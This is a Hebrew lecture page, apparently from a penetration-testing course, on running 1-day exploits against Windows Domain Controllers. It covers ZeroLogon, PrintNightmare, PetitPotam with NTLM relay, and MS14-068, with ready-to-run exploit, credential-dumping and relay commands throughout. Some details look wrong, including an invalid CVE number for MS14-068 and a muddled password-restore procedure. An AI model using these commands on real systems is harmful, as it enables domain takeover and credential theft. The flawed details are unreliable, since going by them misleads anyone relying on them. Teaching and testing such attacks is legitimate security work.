5.7 הרצת חולשות 1day הרצאה

הרצת חולשות 1-Day (זירו-לוגון, ועוד)¶

חולשות 1-Day הן פגיעויות מוכרות שכבר פורסמו ותוקנו על ידי היצרן, אך עדיין ניתן לנצלן במערכות שלא עודכנו. פגיעויות אלו מספקות גישה, הרצת קוד או הרשאות גבוהות בתוך הרשת. אחת הדוגמאות הבולטות היא ZeroLogon (CVE-2020-1472), המאפשרת השתלטות מלאה על Domain Controller תוך שניות.

חולשת ZeroLogon (CVE-2020-1472) – השתלטות על DC¶

חולשת ZeroLogon היא חולשה בפרוטוקול Netlogon של Windows, המאפשרת לתוקף לאמת את עצמו כלוקאלי ללא צורך בסיסמה ולשנות את סיסמת ה-Domain Controller (DC).
זוהי חולשת Privilege Escalation קריטית, המאפשרת השתלטות מלאה על הדומיין.

תנאים לניצול החולשה¶

חיבור לרשת הפנימית או גישה ישירה ל-DC באמצעות SMB/RPC.
מערכת Windows Server 2008-2019 שלא עודכנה עם הפאץ' מאוגוסט 2020.

ניצול ZeroLogon בפועל¶

נשתמש בסקריפט CVE-2020-1472.py של impacket:

python3 zeroLogon.py <DC-NAME> <DC-IP>

לאחר הרצה מוצלחת, התוקף משנה את הסיסמה של חשבון המכונה של ה-DC, מה שמאפשר ביצוע DCSync להוצאת כל הסיסמאות.

שחזור הסיסמה לאחר התקיפה¶

לאחר שינוי סיסמת המכונה, הדומיין עלול לקרוס. לכן, כדאי לגבות את הסיסמה מראש עם secretsdump.py (גם סקריפט בimpacket)

secretsdump.py administrator@<DC-IP> -hashes <NTLM-HASH>

לאחר התקיפה, ניתן לשחזר את הסיסמה:

netdom resetpwd /Server:<DC-NAME> /UserD:<DOMAIN>\Administrator /PasswordD:*

חולשת PrintNightmare (CVE-2021-1675 & CVE-2021-34527) – הרצת קוד כ- SYSTEM¶

חולשה במנהל ההדפסה של Windows המאפשרת Privilege Escalation והרצת קוד ב-DC.

ניצול PrintNightmare¶

python3 CVE-2021-1675.py <DOMAIN>/<USER>@<DC-IP>

לאחר הרצה מוצלחת, מתקבל Shell עם הרשאות SYSTEM ב-DC.

חולשת PetitPotam (CVE-2021-36942) – חטיפת תעודות NTLM והשגת גישה ל-DC¶

חולשה בפרוטוקול MS-EFSRPC, המאפשרת לתוקף לגרום לשרתים לשלוח תעודות NTLM של ה-DC לתוקף.

ניצול PetitPotam לגניבת קרדנציאליים¶

python3 petitpotam.py -u <USER> -p <PASSWORD> -d <DOMAIN> -t <DC-IP>

שימוש בתעודות ל-Relay ולביצוע DCSync¶

python3 ntlmrelayx.py -t ldap://<DC-IP> -smb2support

חולשת MS14-068 – ניצול כרטיסי Kerberos מזויפים¶

חולשה המאפשרת יצירת כרטיס Kerberos מזויף (Golden Ticket) עם Privilege Escalation לכל חשבון.

ניצול החולשה¶

python3 ms14-068.py -u <USER> -d <DOMAIN> -p <PASSWORD> -s <SID> -t <DC-IP>

כניסה עם הכרטיס המזויף¶

klist add_ticket golden.kirbi

חולשות נוספות שכדאי להכיר¶

חולשה	קוד CVE	ניצול אפשרי
Zerologon	CVE-2020-1472	השתלטות מלאה על DC
PrintNightmare	CVE-2021-1675	הרצת קוד ב-DC
PetitPotam	CVE-2021-36942	גניבת NTLM Relay
MS14-068	CVE-2014-068	זיוף כרטיסי Kerberos
HiveNightmare	CVE-2021-36934	גישה לקובץ ה- SAM

התקפות 1-Day מאפשרות לנו לפרוץ לדומיין תוך שניות